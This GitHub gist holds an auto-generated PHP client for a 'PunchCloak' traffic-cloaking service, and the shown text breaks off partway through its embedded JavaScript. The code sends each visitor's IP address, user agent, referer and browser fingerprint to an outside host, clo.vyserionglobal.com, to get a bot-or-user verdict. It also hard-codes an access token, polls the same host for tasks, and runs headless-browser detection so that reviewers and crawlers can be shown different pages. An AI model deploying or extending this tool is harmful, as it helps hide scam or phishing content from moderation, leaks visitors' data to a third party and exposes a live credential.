Created
October 9, 2025 09:26
-
-
Save santaklouse/7f3ce9883eff2ec1bbee0fea67e2fcd8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php /***Thisfileisauto-generatedat:2025-10-0620:30:43byPunchCloakScriptGeneratorservice.*DONOTEDITITMANUALLY!!!*ANYMANUALCHANGESWILLBELOSTDURINGTHENEXTGENERATIONOFTHESCRIPT.*Ifyouneedtochangesomething,pleaseusethePunchCloakwebinterfaceorCLIcommands*orcontactthePunchCloaksupportteamforassistance.*/namespace{if(!function_exists('str_contains')){/***Checkifastringcontainsagivensubstring.**@paramstring$haystackThestringtocheck.*@paramstring$needleThesubstringtolookforinthehaystack.*@returnboolReturnstrueifhaystackcontainsneedle,falseotherwise.*/function str_contains($haystack,$needle){return $needle!==''&&mb_strpos($haystack,$needle)!==false;}}if(!function_exists('str_starts_with')){/***Checkifastringstartswithagivensubstring.**@paramstring$haystackThestringtocheck.*@paramstring$needleThesubstringtolookforatthestartofthehaystack.*@returnboolReturnstrueifhaystackstartswithneedle,falseotherwise.*/function str_starts_with(string $haystack,string $needle):bool{return!strlen($needle)||!strncmp($haystack,$needle,\strlen($needle));}}if(!function_exists('str_ends_with')){/***Checkifastringendswithagivensubstring.**@paramstring$haystackThestringtocheck.*@paramstring$needleThesubstringtolookforattheendofthehaystack.*@returnboolReturnstrueifhaystackendswithneedle,falseotherwise.*/function str_ends_with(string $haystack,string $needle):bool{if($needle===''||$needle===$haystack){return TRUE;}if(''===$haystack){return false;}$needleLength=\strlen($needle);return $needleLength<=\strlen($haystack)&&0===substr_compare($haystack,$needle,-$needleLength);}}if(!function_exists('mb_strrev')){/***Reverseamultibytestring.**@paramstring$stringThestringtobereversed.*@paramstring|null$encodingThecharacterencoding.Ifitisomitted,theinternalcharacterencodingvalue*willbeused.*@returnstringThereversedstring*/function mb_strrev(string $string,string $encoding=null):string{$chars=mb_str_split($string,1,$encoding?:mb_internal_encoding());return implode('',array_reverse($chars));}}if(!function_exists('getallheaders')){/***GetallHTTPheaderkey/valuesasanassociativearrayforthecurrentrequest.**@returnarray<string,string>TheHTTPheaderkey/valuepairs.*/function getallheaders():array{$headers=array();$copy_server=array('CONTENT_TYPE'=>'Content-Type','CONTENT_LENGTH'=>'Content-Length','CONTENT_MD5'=>'Content-Md5',);foreach($_SERVER as $key=>$value){if(substr($key,0,5)==='HTTP_'){$key=substr($key,5);if(!isset($copy_server[$key])||!isset($_SERVER[$key])){$key=str_replace(' ','-',ucwords(strtolower(str_replace('_',' ',$key))));$headers[$key]=$value;}}elseif(isset($copy_server[$key])){$headers[$copy_server[$key]]=$value;}}if(!isset($headers['Authorization'])){if(isset($_SERVER['REDIRECT_HTTP_AUTHORIZATION'])){$headers['Authorization']=$_SERVER['REDIRECT_HTTP_AUTHORIZATION'];}elseif(isset($_SERVER['PHP_AUTH_USER'])){$basic_pass=$_SERVER['PHP_AUTH_PW']?? '';$headers['Authorization']='Basic '.base64_encode($_SERVER['PHP_AUTH_USER'].':'.$basic_pass);}elseif(isset($_SERVER['PHP_AUTH_DIGEST'])){$headers['Authorization']=$_SERVER['PHP_AUTH_DIGEST'];}}return $headers;}}if(!function_exists('xorStringWithKey')){function xorStringWithKey(string $text,string $key):string{$result='';for($i=0;$i<strlen($text);$i++){$textCharCode=ord($text[$i]);$keyCharCode=ord($key[$i%strlen($key)]);$xoredCharCode=$textCharCode^$keyCharCode;$result .= chr($xoredCharCode);}return $result;}}if(\PHP_VERSION_ID<80000&&!interface_exists('Stringable',false)){interface Stringable{/***@returnstring*/public function __toString();}}}namespace Client{/***ClassConfig**ThisclassisresponsibleformanagingtheconfigurationsettingsforthePunchCloakclient.*Itprovidesmethodstoretrieveconfigurationvalues,checkloggingsettings,andmanagewebhookURLs.*@packageClient*@propertystring|null$workflow_idTheIDoftheworkflow.*@propertystring|null$workflow_tokenThetokenoftheworkflow.*@propertystring|null$session_idThesessionIDofthecurrentrequest.*/class Config{const WORKFLOW_ID=21;const WORKFLOW_TOKEN='iQspmjA37LephY2MV8Q7O0VSC98yubCDNpfxIdwwNZLZvMLHeMGuud2b8SZMq8EO';private array $config;/***ReturnsasingletoninstanceofConfig.**@paramarray|null$dataConfigurationdatatoinitializetheinstancewith.*@returnConfig*/public static function getInstance(array $data=null):Config{static $instance=null;if(!is_null($instance)){return $instance;}$instance=new self($data ??(defined('CONFIG')?CONFIG:[]));$instance -> workflow_id=self :: WORKFLOW_ID;$instance -> workflow_token=self :: WORKFLOW_TOKEN;$instance -> session_id=\Client\Session :: getInstance()-> getId();return $instance;}/***Configconstructor.**@paramarray$config*/public function __construct(array $config){$this -> config=$config;}public function __get(string $name){return $this -> get($name);}public function __set(string $name,$value){return $this -> set($name,$value);}public function get(string $key,$default=null){return $this -> config[$key]?? $default;}public function set(string $key,$value):self{$this -> config[$key]=$value;return $this;}public function __isset(string $name):bool{return $this -> has($name);}public function __unset(string $name):void{unset($this -> config[$name]);}public function has(string $key):bool{return isset($this -> config[$key]);}public function all():array{return $this -> config;}public function toJson():string{return json_encode($this -> config);}public function getWorkflowId():?string{return $this -> workflow_id;}public function getWorkflowToken():?string{return $this -> workflow_token;}public function isJsChecksEnabled():bool{return (bool)($this -> get('js_checks')?? false);}public function getIncludeType():IncludeType{return \Client\IncludeType :: from($this -> get('include_type'));}public function isLoggingEnabled():bool{return (bool)($this -> get('logging')?? false);}public function getLogFilePath():string{return $this -> get('log_file')?? '/var/log/punchcloak.log';}public function getWebhookUrl():?string{return $this -> get('webhook_url');}public function getWorkflowName():?string{return $this -> get('workflow_name');}public function isWebhookEnabled():bool{return!empty($this -> getWebhookUrl());}}class PunchAPI{const IP_INFO_API_URL='https://clo.vyserionglobal.com/api/ip/info';const PUT_LOG_API_URL='https://clo.vyserionglobal.com/api/workflow/access-log';const IPQS_API_URL='https://clo.vyserionglobal.com/api/ip/ipqs/check';const CHECK_REQUEST_API_URL='https://clo.vyserionglobal.com/api/workflow/check-request/21';const TASK_GET_NEXT='https://clo.vyserionglobal.com/api/workflow/21/task/next';const TASK_COMPLETED='https://clo.vyserionglobal.com/api/workflow/task/TASK_ID/complete';const TASK_FAILED='https://clo.vyserionglobal.com/api/workflow/task/TASK_ID/fail';const JS_CHECK_API_URL='https://clo.vyserionglobal.com/api/workflow/21/js-check';private static function makeRequest($method,string $url,array $params=[]):string{$workflowToken=\Client\Config :: getInstance()-> getWorkflowToken();$ch=curl_init();curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CUSTOMREQUEST,strtoupper($method));$url .= '?'.http_build_query(['wf-token'=>$workflowToken]);curl_setopt($ch,CURLOPT_HTTPHEADER,['X-Workflow-Token: '.$workflowToken,]);if(!empty($params)){if($method==='GET'){$url .= '&'.http_build_query($params);}else{curl_setopt($ch,CURLOPT_POSTFIELDS,json_encode($params));curl_setopt($ch,CURLOPT_HTTPHEADER,['Content-Type: application/json','Content-Length: '.strlen(json_encode($params))]);}}curl_setopt($ch,CURLOPT_URL,$url);$result=curl_exec($ch);curl_close($ch);return $result;}public static function put(string $url,array $params){return json_decode(self :: makeRequest('PUT',$url,$params),TRUE);}public static function post(string $url,array $params){return json_decode(self :: makeRequest('POST',$url,$params),TRUE);}public static function get(string $url,array $params=[]){return json_decode(self :: makeRequest('GET',$url,$params),TRUE);}public static function getIpInfoFromPunch($ipAddr,$userAgent){$url=\Client\PunchAPI :: IP_INFO_API_URL."/$ipAddr";return \Client\PunchAPI :: get($url,['user-agent'=>$userAgent ?? '',]);}public static function process($ipAddr,$userAgent,$language=null,$referer=null,array $data=[]){return \Client\PunchAPI :: get(\Client\PunchAPI :: CHECK_REQUEST_API_URL,['ip'=>$ipAddr,'user_agent'=>$userAgent,'lang'=>$language,'referer'=>$referer,'fingerprint'=>$data['fingerprint']?? '','host'=>$data['host']?? '','raw_url'=>$data['raw_url']?? '','url'=>$data['url']?? '',]);}public static function jsCheck($data){return \Client\PunchAPI :: post(\Client\PunchAPI :: JS_CHECK_API_URL,$data);}public static function saveIpInfoToLog($info=[]){return \Client\PunchAPI :: put(\Client\PunchAPI :: PUT_LOG_API_URL,$info);}public static function browserApproved($info=[]):array{return \Client\PunchAPI :: put(\Client\PunchAPI :: PUT_LOG_API_URL,$info);}public static function getIPQS($ipAddr,$userAgent,$language=null){return \Client\PunchAPI :: get(\Client\PunchAPI :: IPQS_API_URL."/$ipAddr",['user-agent'=>$userAgent,'lang'=>$language,]);}public static function checkForTask(){return \Client\PunchAPI :: get(\Client\PunchAPI :: TASK_GET_NEXT);}public static function completeTask($taskId,$result){return \Client\PunchAPI :: put(str_replace('TASK_ID',$taskId,\Client\PunchAPI :: TASK_COMPLETED),['result'=>$result,]);}public static function failTask($taskId,$result){return \Client\PunchAPI :: put(str_replace('TASK_ID',$taskId,\Client\PunchAPI :: TASK_FAILED),['result'=>$result,]);}}class IncludeType implements \Stringable{public const CURL=1;public const FILE_GET_CONTENTS=2;public const REDIRECT_PERMANENT=3;public const REDIRECT_TEMPORARY=4;private $value;private function __construct($value){$this -> value=$value;}public static function from($value):self{if(!in_array($value,[self :: CURL,self :: FILE_GET_CONTENTS,self :: REDIRECT_PERMANENT,self :: REDIRECT_TEMPORARY])){throw new \InvalidArgumentException('Invalid include type value');}return new self($value);}public function getValue(){return $this -> value;}public function __toString():string{switch($this -> value){case self :: CURL:return 'CURL';case self :: FILE_GET_CONTENTS:return 'FILE_GET_CONTENTS';case self :: REDIRECT_PERMANENT:return 'REDIRECT_PERMANENT';case self :: REDIRECT_TEMPORARY:return 'REDIRECT_TEMPORARY';default:return 'UNKNOWN';}}}/***@propertymixed|string|null$request_fingerprint*/class Session implements \Stringable{public const SESSION_LIFETIME=14400;private static?Session $instance=null;private string $storagePath;/***@returnstring*/public function getStoragePath():string{return $this -> storagePath;}public function purge():int{if(is_dir($this -> getStoragePath())){return count(array_map(fn($filePath)=>unlink(realpath($filePath)),glob($this -> getStoragePath()."/sess_*")));}return 0;}private function __construct(){if(!is_null(\Client\Session :: $instance)){/*// If an instance already exists, return it*/return \Client\Session :: $instance;}$this -> storagePath=implode(DIRECTORY_SEPARATOR,[dirname(__FILE__),'.session_data']);is_dir($this -> storagePath)or mkdir($this -> storagePath);if(ini_get("session.use_trans_sid")){ini_set("url_rewriter.tags","");ini_set("session.use_trans_sid",FALSE);}ini_set("session.gc_maxlifetime",\Client\Session :: SESSION_LIFETIME);ini_set("session.gc_divisor","1");ini_set("session.gc_probability","1");ini_set("session.cookie_lifetime","0");ini_set("session.save_path",$this -> storagePath);if(session_status()!==PHP_SESSION_ACTIVE){session_start();}\Client\Session :: $instance=$this;}public static function getInstance():Session{if(!is_null(\Client\Session :: $instance)){return \Client\Session :: $instance;}/*// If no instance exists, create a new one*/\Client\Session :: $instance=new \Client\Session();return \Client\Session :: $instance;}public function getId():string{return session_id();}public function set($key,$value):void{$_SESSION[$key]=$value;}public function get($key,$default=null){return $_SESSION[$key]?? $default;}/***Checkifthevalueofthegivenkeymatchestheprovidedvalue*@paramstring$key*@param$value*@returnbool*/public function equals(string $key,$value):bool{if(!$this -> has($key)){return FALSE;}return $this -> get($key)===$value;}public function has($key):bool{return isset($_SESSION[$key]);}public function remove($key):void{unset($_SESSION[$key]);}public function all():array{return $_SESSION;}public function destroy():void{session_destroy();}public function __get(string $name){return $this -> get($name);}public function __set(string $name,$value){$this -> set($name,$value);}public function __isset(string $name){return $this -> has($name);}public function __unset(string $name){$this -> remove($name);}public function __toString():string{return json_encode($this -> all());}public function __destruct(){if(session_status()===PHP_SESSION_ACTIVE){session_write_close();}}public static function addJSCheckedCookie():string{$cookieName='jc_'.self :: getEncodedKey();$cookieValue=base64_encode(xorStringWithKey(\Client\Config :: getInstance()-> getWorkflowToken(),$cookieName));setcookie($cookieName,$cookieValue,time()+(86400*30),"/");/*// 86400 = 1 day*/\Client\Session :: getInstance()-> set('js_checked',true);return $cookieValue;}public static function checkJSCheckedCookie():bool{$cookieName='jc_'.self :: getEncodedKey();$cookieValue=\Client\Http\Request :: getInstance()-> getCookie($cookieName);if(\Client\Session :: getInstance()-> get('js_checked')){self :: addJSCheckedCookie();return TRUE;}else{if(!$cookieValue){return false;}$decodedCookie=xorStringWithKey(base64_decode($cookieValue),$cookieName);\Client\Logger :: info("Decoded cookie: {$decodedCookie}");return $decodedCookie===\Client\Config :: getInstance()-> getWorkflowToken();}}public static function removeJSCheckCookie():void{\Client\Session :: getInstance()-> remove('js_checked');$cookieName='jc_'.self :: getEncodedKey();setcookie($cookieName,'',time()-3600,"/");}public static function getEncodedKey():string{$workflowToken=\Client\Config :: getInstance()-> getWorkflowId();return str_replace('=','',base64_encode("#{$workflowToken}"));}}/***@methodstaticvoidinfo(string$message)*@methodstaticvoidwarn(string$message)*@methodstaticvoiderror(string$message)*/class Logger{public const MAP=['error'=>256,'warn'=>512,'info'=>1024];public static string $logFilePath='./.punchcloak/punchcloak.log';/***@paramstring$logFilePath*/public static function setLogFilePath(string $logFilePath):void{self :: $logFilePath=$logFilePath;if(!file_exists($logFilePath)){$dir=dirname($logFilePath);if(!is_dir($dir)){mkdir($dir,0755,true);}file_put_contents($logFilePath,"PunchCloak Logger initialized at ".date('Y-m-d H:i:s')."\n");}}/***@returnstring*/public static function getLogFilePath():string{return self :: $logFilePath;}private function __construct(){}public static function write($message):void{if(!($path=realpath(self :: getLogFilePath()))){$path=self :: getLogFilePath();}self :: setLogFilePath($path);if(file_exists(self :: getLogFilePath())){$message=date('Y-m-d H:i:s')." - ".$message."\n";file_put_contents(self :: getLogFilePath(),$message,FILE_APPEND);}}public static function __callStatic(string $name,array $arguments){$name=strtolower($name);if(!array_key_exists($name,self :: MAP)){$name='info';}$type=self :: MAP[$name];$message=$arguments[0]?? '';if(count($arguments)>1){$message=implode('|',$arguments);}self :: write("PHP {$name}: $message");trigger_error($message,$type);}}class CloakCore{public const VERDICT_USER='USER';public const VERDICT_BOT='BOT';const CLIENT_JS_LIBS_CODE='(function(){function aa(a){return JSON.stringify(Object.keys(a).sort().reduce((b,c)=>{b[c]=a[c];return b},{}))}const ba=a=>!!Array.from(a.headers.get("Content-Type").matchAll(/json|javascript/gi)).length;function l(a,b=(...c)=>{c.length||(c=a.toString(),c=c.substr(9),c=c.substr(0,c.indexOf("(")));return JSON.stringify(c)}){const c=new Map;return(...e)=>{const d=b(...e);if(c.has(d))return c.get(d);e=a.apply(a,e);c.set(d,e);return e}}
typeof module!=="undefined"&&module.exports?module.exports={ra:aa,oa:ba,pa:l}:window.Utils={stableStringify:aa,isJsonResponse:ba,memoize:l};function ca(a){const b=Array.from(a),c=b.length;return function*(e){let d=0;for(const f of e)yield c===0?f:String.fromCharCode(f.charCodeAt(0)^b[d++%c].charCodeAt(0))}}function da(a,b=0){let c=3735928559^b;b^=1103547991;for(let e=0,d;e<a.length;e++)d=a.charCodeAt(e),c=Math.imul(c^d,2246822519),b=Math.imul(b^d,3266489917);c^=Math.imul(c^b>>>15,1935289751);b^=Math.imul(b^c>>>15,3405138345);c^=b>>>16;return 2097152*((b^c>>>16)>>>0)+(c>>>11)}
function ea(a){function b(k,p){return k>>>p|k<<32-p}var c=Math.pow,e=c(2,32),d;let f="";var g=[],n=a.length*8,q;let h=q=q||[];q=d=d||[];var x=q.length,y={};for(var w=2;x<64;w++)if(!y[w]){for(d=0;d<313;d+=w)y[d]=w;h[x]=c(w,.5)*e|0;q[x++]=c(w,1/3)*e|0}for(a+="\u0080";a.length%64-56;)a+="\x00";for(d=0;d<a.length;d++){c=a.charCodeAt(d);if(c>>8)return;g[d>>2]|=c<<(3-d)%4*8}g[g.length]=n/e|0;g[g.length]=n;for(c=0;c<g.length;){a=g.slice(c,c+=16);e=h;h=h.slice(0,8);for(d=0;d<64;d++)x=a[d-15],y=a[d-2],n=h[0],
w=h[4],x=h[7]+(b(w,6)^b(w,11)^b(w,25))+(w&h[5]^~w&h[6])+q[d]+(a[d]=d<16?a[d]:a[d-16]+(b(x,7)^b(x,18)^x>>>3)+a[d-7]+(b(y,17)^b(y,19)^y>>>10)|0),n=(b(n,2)^b(n,13)^b(n,22))+(n&h[1]^n&h[2]^h[1]&h[2]),h=[x+n|0].concat(h),h[4]=h[4]+x|0;for(d=0;d<8;d++)h[d]=h[d]+e[d]|0}for(d=0;d<8;d++)for(c=3;c+1;c--)g=h[d]>>c*8&255,f+=(g<16?0:"")+g.toString(16);return f}
function r(a,b){var c=a[0],e=a[1],d=a[2],f=a[3];c=t(e&d|~e&f,c,e,b[0],7,-680876936);f=t(c&e|~c&d,f,c,b[1],12,-389564586);d=t(f&c|~f&e,d,f,b[2],17,606105819);e=t(d&f|~d&c,e,d,b[3],22,-1044525330);c=t(e&d|~e&f,c,e,b[4],7,-176418897);f=t(c&e|~c&d,f,c,b[5],12,1200080426);d=t(f&c|~f&e,d,f,b[6],17,-1473231341);e=t(d&f|~d&c,e,d,b[7],22,-45705983);c=t(e&d|~e&f,c,e,b[8],7,1770035416);f=t(c&e|~c&d,f,c,b[9],12,-1958414417);d=t(f&c|~f&e,d,f,b[10],17,-42063);e=t(d&f|~d&c,e,d,b[11],22,-1990404162);c=t(e&d|~e&f,
c,e,b[12],7,1804603682);f=t(c&e|~c&d,f,c,b[13],12,-40341101);d=t(f&c|~f&e,d,f,b[14],17,-1502002290);e=t(d&f|~d&c,e,d,b[15],22,1236535329);c=t(e&f|d&~f,c,e,b[1],5,-165796510);f=t(c&d|e&~d,f,c,b[6],9,-1069501632);d=t(f&e|c&~e,d,f,b[11],14,643717713);e=t(d&c|f&~c,e,d,b[0],20,-373897302);c=t(e&f|d&~f,c,e,b[5],5,-701558691);f=t(c&d|e&~d,f,c,b[10],9,38016083);d=t(f&e|c&~e,d,f,b[15],14,-660478335);e=t(d&c|f&~c,e,d,b[4],20,-405537848);c=t(e&f|d&~f,c,e,b[9],5,568446438);f=t(c&d|e&~d,f,c,b[14],9,-1019803690);
d=t(f&e|c&~e,d,f,b[3],14,-187363961);e=t(d&c|f&~c,e,d,b[8],20,1163531501);c=t(e&f|d&~f,c,e,b[13],5,-1444681467);f=t(c&d|e&~d,f,c,b[2],9,-51403784);d=t(f&e|c&~e,d,f,b[7],14,1735328473);e=t(d&c|f&~c,e,d,b[12],20,-1926607734);c=t(e^d^f,c,e,b[5],4,-378558);f=t(c^e^d,f,c,b[8],11,-2022574463);d=t(f^c^e,d,f,b[11],16,1839030562);e=t(d^f^c,e,d,b[14],23,-35309556);c=t(e^d^f,c,e,b[1],4,-1530992060);f=t(c^e^d,f,c,b[4],11,1272893353);d=t(f^c^e,d,f,b[7],16,-155497632);e=t(d^f^c,e,d,b[10],23,-1094730640);c=t(e^
d^f,c,e,b[13],4,681279174);f=t(c^e^d,f,c,b[0],11,-358537222);d=t(f^c^e,d,f,b[3],16,-722521979);e=t(d^f^c,e,d,b[6],23,76029189);c=t(e^d^f,c,e,b[9],4,-640364487);f=t(c^e^d,f,c,b[12],11,-421815835);d=t(f^c^e,d,f,b[15],16,530742520);e=t(d^f^c,e,d,b[2],23,-995338651);c=t(d^(e|~f),c,e,b[0],6,-198630844);f=t(e^(c|~d),f,c,b[7],10,1126891415);d=t(c^(f|~e),d,f,b[14],15,-1416354905);e=t(f^(d|~c),e,d,b[5],21,-57434055);c=t(d^(e|~f),c,e,b[12],6,1700485571);f=t(e^(c|~d),f,c,b[3],10,-1894986606);d=t(c^(f|~e),d,
f,b[10],15,-1051523);e=t(f^(d|~c),e,d,b[1],21,-2054922799);c=t(d^(e|~f),c,e,b[8],6,1873313359);f=t(e^(c|~d),f,c,b[15],10,-30611744);d=t(c^(f|~e),d,f,b[6],15,-1560198380);e=t(f^(d|~c),e,d,b[13],21,1309151649);c=t(d^(e|~f),c,e,b[4],6,-145523070);f=t(e^(c|~d),f,c,b[11],10,-1120210379);d=t(c^(f|~e),d,f,b[2],15,718787259);e=t(f^(d|~c),e,d,b[9],21,-343485551);a[0]=c+a[0]&4294967295;a[1]=e+a[1]&4294967295;a[2]=d+a[2]&4294967295;a[3]=f+a[3]&4294967295}
function t(a,b,c,e,d,f){b=(b+a&4294967295)+(e+f&4294967295)&4294967295;return(b<<d|b>>>32-d)+c&4294967295}const fa="0123456789abcdef".split("");
function ha(a){var b=a,c=b.length;a=[1732584193,-271733879,-1732584194,271733878];var e;for(e=64;e<=b.length;e+=64){var d,f=b.substring(e-64,e),g=[];for(d=0;d<64;d+=4)g[d>>2]=f.charCodeAt(d)+(f.charCodeAt(d+1)<<8)+(f.charCodeAt(d+2)<<16)+(f.charCodeAt(d+3)<<24);r(a,g)}b=b.substring(e-64);d=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(e=0;e<b.length;e++)d[e>>2]|=b.charCodeAt(e)<<(e%4<<3);d[e>>2]|=128<<(e%4<<3);if(e>55)for(r(a,d),e=0;e<16;e++)d[e]=0;d[14]=c*8;r(a,d);for(c=0;c<a.length;c++){b=a[c];e="";for(d=
0;d<4;d++)e+=fa[b>>d*8+4&15]+fa[b>>d*8&15];a[c]=e}return a.join("")}function u(a,b){a=[a[0]>>>16,a[0]&65535,a[1]>>>16,a[1]&65535];b=[b[0]>>>16,b[0]&65535,b[1]>>>16,b[1]&65535];var c=[0,0,0,0];c[3]+=a[3]+b[3];c[2]+=c[3]>>>16;c[3]&=65535;c[2]+=a[2]+b[2];c[1]+=c[2]>>>16;c[2]&=65535;c[1]+=a[1]+b[1];c[0]+=c[1]>>>16;c[1]&=65535;c[0]+=a[0]+b[0];c[0]&=65535;return[c[0]<<16|c[1],c[2]<<16|c[3]]}
function v(a,b){a=[a[0]>>>16,a[0]&65535,a[1]>>>16,a[1]&65535];b=[b[0]>>>16,b[0]&65535,b[1]>>>16,b[1]&65535];var c=[0,0,0,0];c[3]+=a[3]*b[3];c[2]+=c[3]>>>16;c[3]&=65535;c[2]+=a[2]*b[3];c[1]+=c[2]>>>16;c[2]&=65535;c[2]+=a[3]*b[2];c[1]+=c[2]>>>16;c[2]&=65535;c[1]+=a[1]*b[3];c[0]+=c[1]>>>16;c[1]&=65535;c[1]+=a[2]*b[2];c[0]+=c[1]>>>16;c[1]&=65535;c[1]+=a[3]*b[1];c[0]+=c[1]>>>16;c[1]&=65535;c[0]+=a[0]*b[3]+a[1]*b[2]+a[2]*b[1]+a[3]*b[0];c[0]&=65535;return[c[0]<<16|c[1],c[2]<<16|c[3]]}
function z(a,b){b%=64;if(b===32)return[a[1],a[0]];if(b<32)return[a[0]<<b|a[1]>>>32-b,a[1]<<b|a[0]>>>32-b];b-=32;return[a[1]<<b|a[0]>>>32-b,a[0]<<b|a[1]>>>32-b]}function A(a,b){b%=64;return b===0?a:b<32?[a[0]<<b|a[1]>>>32-b,a[1]<<b]:[a[1]<<b-32,0]}function B(a,b){return[a[0]^b[0],a[1]^b[1]]}function ia(a){a=B(a,[0,a[0]>>>1]);a=v(a,[4283543511,3981806797]);a=B(a,[0,a[0]>>>1]);a=v(a,[3301882366,444984403]);return a=B(a,[0,a[0]>>>1])}
function ja(a,b){a=a||"";b=b||0;const c=a.length%16,e=a.length-c;let d=[0,b];b=[0,b];let f,g;const n=[2277735313,289559509],q=[1291169091,658871167];for(var h=0;h<e;h+=16)f=[a.charCodeAt(h+4)&255|(a.charCodeAt(h+5)&255)<<8|(a.charCodeAt(h+6)&255)<<16|(a.charCodeAt(h+7)&255)<<24,a.charCodeAt(h)&255|(a.charCodeAt(h+1)&255)<<8|(a.charCodeAt(h+2)&255)<<16|(a.charCodeAt(h+3)&255)<<24],g=[a.charCodeAt(h+12)&255|(a.charCodeAt(h+13)&255)<<8|(a.charCodeAt(h+14)&255)<<16|(a.charCodeAt(h+15)&255)<<24,a.charCodeAt(h+
8)&255|(a.charCodeAt(h+9)&255)<<8|(a.charCodeAt(h+10)&255)<<16|(a.charCodeAt(h+11)&255)<<24],f=v(f,n),f=z(f,31),f=v(f,q),d=B(d,f),d=z(d,27),d=u(d,b),d=u(v(d,[0,5]),[0,1390208809]),g=v(g,q),g=z(g,33),g=v(g,n),b=B(b,g),b=z(b,31),b=u(b,d),b=u(v(b,[0,5]),[0,944331445]);f=[0,0];g=[0,0];switch(c){case 15:g=B(g,A([0,a.charCodeAt(h+14)],48));case 14:g=B(g,A([0,a.charCodeAt(h+13)],40));case 13:g=B(g,A([0,a.charCodeAt(h+12)],32));case 12:g=B(g,A([0,a.charCodeAt(h+11)],24));case 11:g=B(g,A([0,a.charCodeAt(h+
10)],16));case 10:g=B(g,A([0,a.charCodeAt(h+9)],8));case 9:g=B(g,[0,a.charCodeAt(h+8)]),g=v(g,q),g=z(g,33),g=v(g,n),b=B(b,g);case 8:f=B(f,A([0,a.charCodeAt(h+7)],56));case 7:f=B(f,A([0,a.charCodeAt(h+6)],48));case 6:f=B(f,A([0,a.charCodeAt(h+5)],40));case 5:f=B(f,A([0,a.charCodeAt(h+4)],32));case 4:f=B(f,A([0,a.charCodeAt(h+3)],24));case 3:f=B(f,A([0,a.charCodeAt(h+2)],16));case 2:f=B(f,A([0,a.charCodeAt(h+1)],8));case 1:f=B(f,[0,a.charCodeAt(h)]),f=v(f,n),f=z(f,31),f=v(f,q),d=B(d,f)}d=B(d,[0,a.length]);
b=B(b,[0,a.length]);d=u(d,b);b=u(b,d);d=ia(d);b=ia(b);d=u(d,b);b=u(b,d);return("00000000"+(d[0]>>>0).toString(16)).slice(-8)+("00000000"+(d[1]>>>0).toString(16)).slice(-8)+("00000000"+(b[0]>>>0).toString(16)).slice(-8)+("00000000"+(b[1]>>>0).toString(16)).slice(-8)}
const C={v:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",o:null,ma:/MSIE /.test(navigator.userAgent),na:/MSIE [67]/.test(navigator.userAgent),encode:function(a){try{return C.fa(a)}catch(f){}a=typeof a==="string"?C.ea(a):a;let b=[],c=0;const e=a.length;for(;c<e;){const f=a[c++],g=a[c++]||0;var d=a[c++]||0;const n=(g&15)<<2|d>>6;d&=63;b.push(C.v[f>>2],C.v[(f&3)<<4|g>>4],c-1>e?"=":C.v[n],c>e?"=":C.v[d])}return b.join("")},decode:function(a){try{return C.P(a)}catch(f){}if(a.length%
4)throw Error("Invalid base64 string length");a=C.T(a);const b=a.length;let c=[],e=0;for(;e<b;){const f=a[e++];if(f<128)c.push(String.fromCharCode(f));else if(f>191&&f<224){if(e>=b)throw Error("Invalid UTF-8 sequence");var d=a[e++];c.push(String.fromCharCode((f&31)<<6|d&63))}else{if(e+1>=b)throw Error("Invalid UTF-8 sequence");d=a[e++];const g=a[e++];c.push(String.fromCharCode((f&15)<<12|(d&63)<<6|g&63))}}return c.join("")},ea:function(a){var b,c=-1,e=a.length,d=[];if(/^[\x00-\x7f]*$/.test(a))for(;++c<
e;)d.push(a.charCodeAt(c));else for(;++c<e;)(b=a.charCodeAt(c))<128?d.push(b):b<2048?d.push(b>>6|192,b&63|128):d.push(b>>12|224,b>>6&63|128,b&63|128);return d},T:function(a){if(!C.o){C.o={};for(var b=0;b<C.v.length;b++)C.o[C.v[b]]=b}b=[];let c=0;const e=a.length;for(;c<e;){const d=C.o[a.charAt(c++)],f=C.o[a.charAt(c++)],g=a.charAt(c)!=="="?C.o[a.charAt(c)]:64,n=a.charAt(c+1)!=="="?C.o[a.charAt(c+1)]:64,q=(f&15)<<4|g>>2,h=(g&3)<<6|n;b.push(d<<2|f>>4);g!==64&&b.push(q);n!==64&&b.push(h);c+=2}return b},
fa:a=>btoa(unescape(encodeURIComponent(a))),P:a=>decodeURIComponent(escape(atob(a)))};function ka(a){return ea(a)}function na(a){let b=-559038737,c=1103547991;for(let e=0,d;e<a.length;e++)d=a.charCodeAt(e),b=Math.imul(b^d,2654435761),c=Math.imul(c^d,1597334677);b=Math.imul(b^b>>>16,2246822507);b^=Math.imul(c^c>>>13,3266489909);c=Math.imul(c^c>>>16,2246822507);c^=Math.imul(b^b>>>13,3266489909);return 4294967296*(2097151&c)+(b>>>0)}function oa(a,b=0){return da(a,b)}
function D(a,b){console.log("xorStringWithKey STR:",a);console.log("xorStringWithKey KEY:",b);let c="";for(let e=0;e<a.length;e++)c+=String.fromCharCode(a.charCodeAt(e)^b.charCodeAt(e%b.length));return c}async function pa(a){return ca(a)}function qa(a){return ha(a)}class E{}typeof module!=="undefined"&&module.exports?module.exports=E:(window.Crypto=E,E.sha256=ka,E.cyrb53=na,E.cyrb53a_beta=oa,E.xorStringWithKey=D,E.xorStringWithKeyGenerator=pa,E.Base64=C,E.md5=qa,E.md5Hash=ha,E.x64Hash128=ja);function ra(){const a=navigator.mimeTypes;let b=MimeTypeArray.prototype===a.__proto__;a.length>0&&(b=b&&MimeType.prototype===a[0].__proto__);return["MIME type prototype validation: "+(b?"valid":"invalid"),b?0:1]}function sa(){const a=navigator.language,b=navigator.languages.length;return["Primary language: "+a+", total languages: "+b,a&&b>0?0:1]}function ta(){F||(F=new G);return F}function ua(){return va()}
function va(){const a=ta(),b=wa.map(function(c){return xa(a,c)});return Promise.all(b).then(function(){a.da=!0;return ya(a)})}function xa(a,b){const c=b.i;if(typeof c!=="function")throw Error("Test function invalid for test: "+b.h);return(c.constructor.name==="AsyncFunction"?c.call(a):Promise.resolve(c.call(a))).then(function(e){const d=e[1];a.F[b.h]={O:b.displayName,ca:[e[0],d,d===1?"headless":d===0?"normal":"inconclusive"]}})}
